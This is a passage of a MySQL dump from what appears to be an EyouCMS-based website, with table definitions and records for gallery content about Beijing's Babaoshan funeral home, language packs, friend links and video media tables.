7、售盒服务员:服务态度和蔼,熟悉商品特点,主动介绍商品,满足不同层次的需要。</p>\r\n<p>\r\n 8、刻字工:按要求逐字刻印,字迹清楚,准确无误。</p>\r\n<p>\r\n 9、收银员:认真审核收费项目,填写标据字迹清楚,收款时唱收唱付。</p>\r\n<p>\r\n 10、发灰员:严格按照发灰手续办理,凭火化证发放骨灰。尊重逝者,双手递送,杜绝差错。</p>\r\n<p>\r\n 11、骨灰堂服务员:填写卡片字迹清楚,准确无误;陪同家属到达存骨灰堂室。</p>\r\n<p>\r\n 服务时限:1、全天候二十四小时提供殡仪服务。2、按照丧家要求准时到达接运遗体地点。3、以遗体进入火化车间为准,四小时内取灰。</p>\r\n<p>\r\n 向社会各界郑重承诺:</p>\r\n<p>\r\n 1、加强廉政建设,纠正行业不正之风,严格遵守职业道德规范,不得接受丧家馈增的烟、酒、钱、物。</p>\r\n<p>\r\n 2、坚持优质服务,文明用语,礼貌待人,主动热情,严格按照殡仪服务规范进行工作。</p>\r\n<p>\r\n 3、严格执行国家物价部门规定的收费标准。</p>\r\n<p>\r\n 4、实行面对全市各区县和国内、国际的二十四小时全天候&ldquo;一条龙&rdquo;服务,并保证灵车随叫随到接运遗体(四小时之内)。</p>\r\n<p>\r\n 5、火化遗体保证文明操作,一炉一尸,保证当天取灰(四小时)之内。</p>\r\n', '北京市石景山区石景山路9号', '113.269251', '23.201809');
INSERT INTO `ey_images18_content` VALUES ('2', '19', '1637133079', '1637133079', 'a:3:{i:0;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200603/1-2006031SS0.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200603/1-2006031SS3.jpg\";s:5:\"intro\";s:0:\"\";}i:2;a:2:{s:9:\"image_url\";s:39:\"/uploads/allimg/200603/1-2006031SS6.jpg\";s:5:\"intro\";s:0:\"\";}}', '<p>\r\n 北京市八宝山殡仪馆是全市规模最大、设施齐全的殡仪服务单位,承担着本市城近郊区市民、已故党和国家领导人、海外侨胞、国际友人的殡仪服务业务。每年承办告别活动6000余场,接待来宾近百万人次,年火化量2万多具。本馆坚持&ldquo;服务第一,丧家至上&rdquo;的宗旨,不断推行科学管理,提高服务质量,受到社会好评,连续多次被评为&ldquo;首都精神文明单位&rdquo;、&ldquo;全国殡葬改革先进单位&rdquo;、&ldquo;北京市花园市单位&rdquo;,2004年被国家民政部评为全国民政基层行风建设先进集体。</p>\r\n<p>\r\n 八宝山殡仪馆始建于1958年,是北京历史上较早的殡仪馆之一。多年来,几经大规模建设改造,已经形成一整套独特的建设风格和服务体系,&ldquo;八宝山&rdquo;因此而成为中国殡葬业的代名词。</p>\r\n<p>\r\n 服务标准:殡仪服务人员要统一着装,仪表端庄,语言文明,挂牌服务;各岗位职责明确,规范服务;遵守职业道德,拒收馈赠,杜绝索取财物。执行国家物价部门规定的收费标准。</p>\r\n', '广州市平谷区西峪水库东岸', '113.269251', '23.201809');
INSERT INTO `ey_images18_content` VALUES ('3', '20', '1637133079', '1637133079', 'a:3:{i:0;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031S923.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031S926.jpg\";s:5:\"intro\";s:0:\"\";}i:2;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031S929.jpg\";s:5:\"intro\";s:0:\"\";}}', '<p>\r\n 北京市八宝山殡仪馆是全市规模最大、设施齐全的殡仪服务单位,承担着本市城近郊区市民、已故党和国家领导人、海外侨胞、国际友人的殡仪服务业务。每年承办告别活动6000余场,接待来宾近百万人次,年火化量2万多具。本馆坚持&ldquo;服务第一,丧家至上&rdquo;的宗旨,不断推行科学管理,提高服务质量,受到社会好评,连续多次被评为&ldquo;首都精神文明单位&rdquo;、&ldquo;全国殡葬改革先进单位&rdquo;、&ldquo;北京市花园市单位&rdquo;,2004年被国家民政部评为全国民政基层行风建设先进集体。</p>\r\n<p>\r\n 八宝山殡仪馆始建于1958年,是北京历史上较早的殡仪馆之一。多年来,几经大规模建设改造,已经形成一整套独特的建设风格和服务体系,&ldquo;八宝山&rdquo;因此而成为中国殡葬业的代名词。</p>\r\n<p>\r\n 服务标准:殡仪服务人员要统一着装,仪表端庄,语言文明,挂牌服务;各岗位职责明确,规范服务;遵守职业道德,拒收馈赠,杜绝索取财物。执行国家物价部门规定的收费标准。</p>\r\n<p>\r\n 1、&ldquo;一条龙&rdquo;车辆调度室服务员:使用文明用语,服务态度热情,耐心解答询问,准确叮嘱家属等车时间、地点、注意事项。</p>\r\n<p>\r\n 2、灵车司机:服从调度室安排,准时到达接运遗体地点;文明驾驶,保证车辆平稳不颠簸,转弯和过路口时照顾家属车辆,不甩车。</p>\r\n<p>\r\n 3、引导服务员(接尸工):接运遗体轻抬轻放;尊重亡者,脱穿衣文明;主动服务,满足要求;排忧解难,耐心周到。</p>\r\n<p>\r\n 4、整容工:一般整容化妆着色均匀、自然、神态安祥、衣着整齐。特殊整容力求恢复原貌达到亡者家属满意。</p>\r\n', '广州市平谷区西峪水库东岸', '113.269251', '23.201809');
INSERT INTO `ey_images18_content` VALUES ('4', '21', '1637133079', '1637133079', 'a:3:{i:0;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031T021.jpg\";s:5:\"intro\";s:0:\"\";}i:1;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031T024.jpg\";s:5:\"intro\";s:0:\"\";}i:2;a:2:{s:9:\"image_url\";s:40:\"/uploads/allimg/200603/1-2006031T027.jpg\";s:5:\"intro\";s:0:\"\";}}', '<p>\r\n 北京市八宝山殡仪馆是全市规模最大、设施齐全的殡仪服务单位,承担着本市城近郊区市民、已故党和国家领导人、海外侨胞、国际友人的殡仪服务业务。每年承办告别活动6000余场,接待来宾近百万人次,年火化量2万多具。本馆坚持&ldquo;服务第一,丧家至上&rdquo;的宗旨,不断推行科学管理,提高服务质量,受到社会好评,连续多次被评为&ldquo;首都精神文明单位&rdquo;、&ldquo;全国殡葬改革先进单位&rdquo;、&ldquo;北京市花园市单位&rdquo;,2004年被国家民政部评为全国民政基层行风建设先进集体。</p>\r\n<p>\r\n 八宝山殡仪馆始建于1958年,是北京历史上较早的殡仪馆之一。多年来,几经大规模建设改造,已经形成一整套独特的建设风格和服务体系,&ldquo;八宝山&rdquo;因此而成为中国殡葬业的代名词。</p>\r\n<p>\r\n 服务标准:殡仪服务人员要统一着装,仪表端庄,语言文明,挂牌服务;各岗位职责明确,规范服务;遵守职业道德,拒收馈赠,杜绝索取财物。执行国家物价部门规定的收费标准。</p>\r\n<p>\r\n 1、&ldquo;一条龙&rdquo;车辆调度室服务员:使用文明用语,服务态度热情,耐心解答询问,准确叮嘱家属等车时间、地点、注意事项。</p>\r\n<p>\r\n 2、灵车司机:服从调度室安排,准时到达接运遗体地点;文明驾驶,保证车辆平稳不颠簸,转弯和过路口时照顾家属车辆,不甩车。</p>\r\n<p>\r\n 3、引导服务员(接尸工):接运遗体轻抬轻放;尊重亡者,脱穿衣文明;主动服务,满足要求;排忧解难,耐心周到。</p>\r\n<p>\r\n 4、整容工:一般整容化妆着色均匀、自然、神态安祥、衣着整齐。特殊整容力求恢复原貌达到亡者家属满意。</p>\r\n<p>\r\n 5、告别室服务员:尊重家属要求,协助布置会场;提供必要服务。</p>\r\n<p>\r\n 6、火化工:遵守操作规程,保证骨灰质量。</p>\r\n<p>\r\n 7、售盒服务员:服务态度和蔼,熟悉商品特点,主动介绍商品,满足不同层次的需要。</p>\r\n<p>\r\n 8、刻字工:按要求逐字刻印,字迹清楚,准确无误。</p>\r\n<p>\r\n 9、收银员:认真审核收费项目,填写标据字迹清楚,收款时唱收唱付。</p>\r\n', '广州市平谷区西峪水库东岸', '113.269251', '23.201809');
-- -----------------------------
-- Table structure for `ey_images_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_images_content`;
CREATE TABLE `ey_images_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `news_id` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='资讯内容表_存储正常内容';
-- -----------------------------
-- Table structure for `ey_images_upload`
-- -----------------------------
DROP TABLE IF EXISTS `ey_images_upload`;
CREATE TABLE `ey_images_upload` (
`img_id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` mediumint(8) unsigned NOT NULL DEFAULT '0' COMMENT '图集ID',
`title` varchar(200) DEFAULT '' COMMENT '产品标题',
`image_url` varchar(255) DEFAULT '' COMMENT '文件存储路径',
`intro` varchar(2000) DEFAULT '' COMMENT '图集描述',
`width` int(11) DEFAULT '0' COMMENT '图片宽度',
`height` int(11) DEFAULT '0' COMMENT '图片高度',
`filesize` mediumint(8) unsigned DEFAULT '0' COMMENT '文件大小',
`mime` varchar(50) DEFAULT '' COMMENT '图片类型',
`sort_order` smallint(5) DEFAULT '0' COMMENT '排序',
`add_time` int(10) unsigned DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`img_id`),
KEY `arcid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_language`
-- -----------------------------
DROP TABLE IF EXISTS `ey_language`;
CREATE TABLE `ey_language` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '信息ID,自增',
`title` varchar(100) NOT NULL DEFAULT '' COMMENT '语言名称',
`mark` varchar(50) NOT NULL DEFAULT '' COMMENT '语言标识(唯一)',
`url` varchar(200) NOT NULL DEFAULT '' COMMENT '单独域名(外部链接)',
`target` tinyint(1) NOT NULL DEFAULT '0' COMMENT '新窗口打开,0=否,1=是',
`is_home_default` tinyint(1) DEFAULT '0' COMMENT '默认前台语言,1=是,0=否',
`is_admin_default` tinyint(1) DEFAULT '0' COMMENT '默认后台语言,1=是,0=否',
`syn_pack_id` int(10) DEFAULT '0' COMMENT '最后一次同步官方语言包ID',
`status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '语言状态,0=关闭,1=开启',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='多语言主表';
-- -----------------------------
-- Records of `ey_language`
-- -----------------------------
INSERT INTO `ey_language` VALUES ('1', '简体中文', 'cn', '', '0', '1', '1', '24', '1', '100', '1541583096', '1543890743');
-- -----------------------------
-- Table structure for `ey_language_attr`
-- -----------------------------
DROP TABLE IF EXISTS `ey_language_attr`;
CREATE TABLE `ey_language_attr` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '信息ID,自增',
`attr_name` varchar(200) NOT NULL DEFAULT '' COMMENT '来自ey_weapp_language_attr表的attr_name',
`attr_value` text NOT NULL COMMENT '变量值',
`attr_group` varchar(50) DEFAULT '' COMMENT '分组,以表名划分(不含表前缀)',
`lang` varchar(50) NOT NULL DEFAULT '' COMMENT '所属语言',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `attr_value` (`attr_name`,`lang`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='多语言模板变量关联绑定表';
-- -----------------------------
-- Table structure for `ey_language_attribute`
-- -----------------------------
DROP TABLE IF EXISTS `ey_language_attribute`;
CREATE TABLE `ey_language_attribute` (
`attr_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '信息ID,自增',
`attr_title` varchar(200) NOT NULL DEFAULT '' COMMENT '变量标题',
`attr_name` varchar(200) NOT NULL DEFAULT '' COMMENT '变量名称',
`attr_group` varchar(50) DEFAULT '' COMMENT '分组,以表名划分(不含表前缀)',
`is_del` tinyint(1) DEFAULT '0' COMMENT '伪删除,0=否,1=是',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`attr_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='多语言模板变量表';
-- -----------------------------
-- Table structure for `ey_language_mark`
-- -----------------------------
DROP TABLE IF EXISTS `ey_language_mark`;
CREATE TABLE `ey_language_mark` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`title` varchar(50) NOT NULL DEFAULT '' COMMENT '国家语言名称',
`cn_title` varchar(50) NOT NULL DEFAULT '' COMMENT '中文名称',
`mark` varchar(50) DEFAULT '' COMMENT '多语言标识',
`pinyin` varchar(100) DEFAULT '' COMMENT '拼音',
`sort_order` int(10) NOT NULL DEFAULT '0' COMMENT '排序号',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=58 DEFAULT CHARSET=utf8 COMMENT='国家语言表';
-- -----------------------------
-- Records of `ey_language_mark`
-- -----------------------------
INSERT INTO `ey_language_mark` VALUES ('1', '简体中文', '简体中文', 'cn', 'zhongwenjianti', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('2', 'Vietnamese', '越南语', 'vi', 'yuenanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('3', '繁体中文', '繁体中文', 'zh', 'zhongwenfanti', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('4', 'English', '英语', 'en', 'yingyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('5', 'Indonesian', '印尼语', 'id', 'yinniyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('6', 'Urdu', '乌尔都语', 'ur', 'wuerduyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('7', 'Yiddish', '意第绪语', 'yi', 'yidixuyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('8', 'Italian', '意大利语', 'it', 'yidaliyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('9', 'Greek', '希腊语', 'el', 'xilayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('10', 'Spanish Basque', '西班牙的巴斯克语', 'eu', 'xibanyadebasikeyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('11', 'Spanish', '西班牙语', 'es', 'xibanyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('12', 'Hungarian', '匈牙利语', 'hu', 'xiongyaliyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('13', 'Hebrew', '希伯来语', 'iw', 'xibolaiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('14', 'Ukrainian', '乌克兰语', 'uk', 'wukelanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('15', 'Welsh', '威尔士语', 'cy', 'weiershiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('16', 'Thai', '泰语', 'th', 'taiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('17', 'Turkish', '土耳其语', 'tr', 'tuerqiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('18', 'Swahili', '斯瓦希里语', 'sw', 'siwaxiliyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('19', 'Japanese', '日语', 'ja', 'riyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('20', 'Swedish', '瑞典语', 'sv', 'ruidianyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('21', 'Serbian', '塞尔维亚语', 'sr', 'saierweiyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('22', 'Slovak', '斯洛伐克语', 'sk', 'siluofakeyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('23', 'Slovenian', '斯洛文尼亚语', 'sl', 'siluowenniyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('24', 'Portuguese', '葡萄牙语', 'pt', 'putaoyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('25', 'Norwegian', '挪威语', 'no', 'nuoweiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('26', 'Macedonian', '马其顿语', 'mk', 'maqidunyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('27', 'Malay', '马来语', 'ms', 'malaiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('28', 'Maltese', '马耳他语', 'mt', 'maertayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('29', 'Romanian', '罗马尼亚语', 'ro', 'luomaniyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('30', 'Lithuanian', '立陶宛语', 'lt', 'litaowanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('31', 'Latvian', '拉脱维亚语', 'lv', 'latuoweiyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('32', 'Latin', '拉丁语', 'la', 'ladingyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('33', 'Croatian', '克罗地亚语', 'hr', 'keluodiyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('34', 'Czech', '捷克语', 'cs', 'jiekeyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('35', 'Catalan', '加泰罗尼亚语', 'ca', 'jiatailuoniyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('36', 'Galician', '加利西亚语', 'gl', 'jialixiyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('37', 'Dutch', '荷兰语', 'nl', 'helanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('38', 'Korean', '韩语', 'ko', 'hanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('39', 'Haitian Creole', '海地克里奥尔语', 'ht', 'haidikeliaoeryu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('40', 'Finnish', '芬兰语', 'fi', 'fenlanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('41', 'Filipino', '菲律宾语', 'tl', 'feilvbinyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('42', 'Russian', '俄语', 'ru', 'eyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('43', 'Boolean (Afrikaans)', '布尔语(南非荷兰语)', 'af', 'bueryunanfeihelanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('44', 'French', '法语', 'fr', 'fayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('45', 'Danish', '丹麦语', 'da', 'danmaiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('46', 'German', '德语', 'de', 'deyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('47', 'Azerbaijani', '阿塞拜疆语', 'az', 'asaibaijiangyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('48', 'Irish', '爱尔兰语', 'ga', 'aierlanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('49', 'Estonian', '爱沙尼亚语', 'et', 'aishaniyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('50', 'Belarusian', '白俄罗斯语', 'be', 'baieluosiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('51', 'Bulgarian', '保加利亚语', 'bg', 'baojialiyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('52', 'Icelandic', '冰岛语', 'is', 'bingdaoyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('53', 'Polish', '波兰语', 'pl', 'bolanyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('54', 'Persian', '波斯语', 'fa', 'bosiyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('55', 'Arabic', '阿拉伯语', 'ar', 'alaboyu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('56', 'Albanian', '阿尔巴尼亚语', 'sq', 'aerbaniyayu', '100', '0', '1541583096');
INSERT INTO `ey_language_mark` VALUES ('57', 'Uyghur', '维吾尔族语', 'ug', 'weiwuerzuyu', '100', '0', '1541583096');
-- -----------------------------
-- Table structure for `ey_language_pack`
-- -----------------------------
DROP TABLE IF EXISTS `ey_language_pack`;
CREATE TABLE `ey_language_pack` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`name` varchar(50) NOT NULL DEFAULT '' COMMENT '变量名',
`value` text NOT NULL COMMENT '变量值',
`is_syn` tinyint(1) DEFAULT '0' COMMENT '同步官方语言包:0=否,1=是',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=13 DEFAULT CHARSET=utf8 COMMENT='模板语言包变量';
-- -----------------------------
-- Records of `ey_language_pack`
-- -----------------------------
INSERT INTO `ey_language_pack` VALUES ('1', 'sys1', '首页', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('2', 'sys2', '上一页', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('3', 'sys3', '下一页', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('4', 'sys4', '末页', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('5', 'sys5', '共<strong>%s</strong>页 <strong>%s</strong>条', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('6', 'sys6', '全部', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('7', 'sys7', '搜索', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('8', 'sys8', '查看详情', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('9', 'sys9', '网站首页', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('10', 'sys10', '暂无', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('11', 'sys11', '上一篇', '1', 'cn', '100', '1543890216', '1543890216');
INSERT INTO `ey_language_pack` VALUES ('12', 'sys12', '下一篇', '1', 'cn', '100', '1543890216', '1543890216');
-- -----------------------------
-- Table structure for `ey_links`
-- -----------------------------
DROP TABLE IF EXISTS `ey_links`;
CREATE TABLE `ey_links` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`typeid` tinyint(1) DEFAULT '1' COMMENT '类型:1=文字链接,2=图片链接',
`groupid` int(11) unsigned NOT NULL DEFAULT '1' COMMENT '分组id, 默认分组值为1',
`title` varchar(50) DEFAULT '' COMMENT '网站标题',
`url` varchar(100) DEFAULT '' COMMENT '网站地址',
`logo` varchar(255) DEFAULT '' COMMENT '网站LOGO',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`target` tinyint(1) DEFAULT '0' COMMENT '是否开启浏览器新窗口',
`nofollow` tinyint(1) DEFAULT '0',
`email` varchar(50) DEFAULT NULL,
`intro` text COMMENT '网站简况',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=显示,0=屏蔽)',
`province_id` int(10) DEFAULT '0' COMMENT '省份',
`city_id` int(10) DEFAULT '0' COMMENT '所在城市',
`area_id` int(10) DEFAULT '0' COMMENT '所在区域',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`delete_time` int(11) DEFAULT '0' COMMENT '软删除时间',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_links`
-- -----------------------------
INSERT INTO `ey_links` VALUES ('1', '1', '1', '淘宝', 'https://www.taobao.com/', '', '100', '1', '0', '', '', '1', '0', '0', '0', 'cn', '0', '1533550678', '1686213627');
-- -----------------------------
-- Table structure for `ey_links_group`
-- -----------------------------
DROP TABLE IF EXISTS `ey_links_group`;
CREATE TABLE `ey_links_group` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`group_name` varchar(255) NOT NULL DEFAULT '' COMMENT '分组名称',
`status` tinyint(2) unsigned NOT NULL DEFAULT '1' COMMENT '状态(1=显示,0=屏蔽)',
`sort_order` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '排序号',
`lang` varchar(50) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(10) unsigned NOT NULL DEFAULT '0',
`update_time` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='友情链接分组';
-- -----------------------------
-- Records of `ey_links_group`
-- -----------------------------
INSERT INTO `ey_links_group` VALUES ('1', '默认分组', '1', '100', 'cn', '1613986047', '1613986047');
-- -----------------------------
-- Table structure for `ey_media_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_media_content`;
CREATE TABLE `ey_media_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) NOT NULL DEFAULT '0' COMMENT '文档ID',
`content` longtext COMMENT '内容详情',
`content_ey_m` longtext COMMENT '手机端内容详情',
`courseware` varchar(200) NOT NULL DEFAULT '' COMMENT '课件地址',
`courseware_free` enum('免费','收费') NOT NULL DEFAULT '免费' COMMENT '课件收费',
`total_duration` int(10) NOT NULL DEFAULT '0' COMMENT '视频总时长',
`total_video` int(10) NOT NULL DEFAULT '0' COMMENT '视频数',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE,
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='视频附加表';
-- -----------------------------
-- Table structure for `ey_media_file`
-- -----------------------------
DROP TABLE IF EXISTS `ey_media_file`;
CREATE TABLE `ey_media_file` (
`file_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '视频模型文件表',
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`title` varchar(200) NOT NULL DEFAULT '' COMMENT '文档标题',
`file_name` varchar(200) NOT NULL DEFAULT '' COMMENT '文件名称',
`file_title` varchar(200) NOT NULL DEFAULT '' COMMENT '选集标题',
`file_url` text NOT NULL COMMENT '存储路径',
`file_time` int(8) NOT NULL DEFAULT '0' COMMENT '文件时长',
`file_ext` varchar(50) NOT NULL DEFAULT '' COMMENT '文件后缀名',
`file_size` varchar(255) NOT NULL DEFAULT '' COMMENT '文件大小',
`file_mime` varchar(200) NOT NULL DEFAULT '' COMMENT '文件类型',
`uhash` varchar(200) NOT NULL DEFAULT '' COMMENT '自定义的一种加密方式,用于视频播放的权限验证',
`md5file` varchar(200) NOT NULL DEFAULT '' COMMENT 'md5_file加密,可以检测上传/播放的视频文件是否损坏',
`is_remote` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否远程 1-远程',
`playcount` int(10) NOT NULL DEFAULT '0' COMMENT '播放次数',
`gratis` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否试看,0不试看,1试看',
`sort_order` smallint(5) NOT NULL DEFAULT '0' COMMENT '排序',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '上传时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`file_id`) USING BTREE,
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='视频附件表';
-- -----------------------------
-- Table structure for `ey_media_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_media_log`;
CREATE TABLE `ey_media_log` (
`log_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`users_id` int(10) DEFAULT '0' COMMENT '用户ID',
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`file_id` int(10) DEFAULT '0' COMMENT '视频ID',
`ip` varchar(20) DEFAULT '' COMMENT 'ip',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '编辑时间',
PRIMARY KEY (`log_id`),
KEY `file_id` (`file_id`,`aid`,`users_id`) USING BTREE,
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='视频日志表';
-- -----------------------------
-- Table structure for `ey_media_order`
-- -----------------------------
DROP TABLE IF EXISTS `ey_media_order`;
CREATE TABLE `ey_media_order` (
